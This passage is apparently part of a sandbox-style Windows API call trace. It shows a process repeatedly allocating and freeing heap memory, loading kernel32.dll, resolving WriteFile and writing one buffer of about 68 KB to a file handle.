(HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0184.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0184.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0184.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0184.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0184.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0184.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0184.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0184.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0184.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0184.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0184.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.836] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd360 [0184.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd360, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.836] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0184.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.837] WriteFile (in: hFile=0x120, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x10b3f, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x10b3f, lpOverlapped=0x0) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0184.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0184.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0184.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0184.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0184.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0184.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0184.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.839] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 